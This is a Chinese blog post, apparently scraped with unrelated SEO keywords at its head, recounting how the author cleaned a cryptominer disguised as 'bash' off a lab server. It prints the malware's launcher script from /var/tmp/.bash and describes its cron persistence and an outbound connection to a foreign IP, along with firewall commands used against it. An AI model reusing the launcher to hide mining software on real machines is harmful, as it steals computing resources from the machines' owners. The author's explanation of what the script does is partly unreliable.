有哪些网站可以做家教,银徽seo,wordpress category name,廊坊seo培训最近在跑实验#xff0c;但是突然发现程序运行变慢#xff0c;然后top命令查看程序运行情况#xff0c;发现有异常进程#xff0c;名字叫 bash#xff0c;占用 2400% CPU计算资源。刚开始怀疑是挖矿程序#xff0c;因实验室网络IP为教育网公网#xff0c;怀疑被攻击但是突然发现程序运行变慢然后top命令查看程序运行情况发现有异常进程名字叫 bash占用 2400% CPU计算资源。刚开始怀疑是挖矿程序因实验室网络IP为教育网公网怀疑被攻击网上查了些资料并参考了下面博客记一次服务器被挖矿程序占用的解决过程_dabao87的博客-CSDN博客_服务器被挖矿blog.csdn.net通过搜索这个进程名字发现异常文件 /var/tmp/.bash/bashfind / -name bash打开这个脚本发现脚本语言如下#!/bin/bash
cd -- /var/tmp/.bash
mkdir -- .bash
cp -f -- x86_64 .bash/bash
./.bash/bash -k -c
rm -rf .bash
这个分明是不断消耗CPU资源不断递归创建删除文件的恶意脚本将脚本文件删除之后用kill命令将程序id杀死后计算机恢复。因为前期实验室密码设置的过于简单重新修改了密码提醒大家如果服务器IP是公网IP要谨慎一些。事情还没完太讨厌了更新在下午解决问题之后以为服务器好了但是晚上又出现了新的 bash进程在咨询了遇到同样问题的老哥 yr15 之后得知有可能被设置了定时任务cron定时启动bash命令。可以看到这个脚本是2020年10月20号写入的。把他删了希望完事了。太讨厌了再更解决后第二天它又出现了没错是又出现了~~然后差点想重装系统最后试了一下将定时服务关闭将进程杀死。停止定时任务命令service crond stop可能是定时任务里面保存了那个脚本的相关东西现在好像一天没有出现了。再更病毒换了策略它建立了一个tcp连接来入侵我们电脑但是为什么会这样还没整清楚netstat -anp | grep bash
tcp 0 0 ***.***.91.12:35910 51.79.73.21:80 ESTABLISHED 25782/-bash
这个ip 51.79.73.21:80 是加拿大的。开启了防火墙rootxuan:~# sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
rootxuan:~# sudo ufw deny 35910
Rule added
Rule added (v6)
rootxuan:~# sudo ufw status
Status: activeTo Action From
-- ------ ----
35910 DENY Anywhere
35910 (v6) DENY Anywhere (v6) 禁止那个ip tcp连接
sudo ufw deny from 51.79.73.21rootxuan:~# netstat -anp | grep bashtcp 0 0 **.30..7*9:36024 51.79.73.21:80 ESTABLISHED 810/-bashlsof -p 810-eugen.whitehat.at:http (ESTABLISHED)
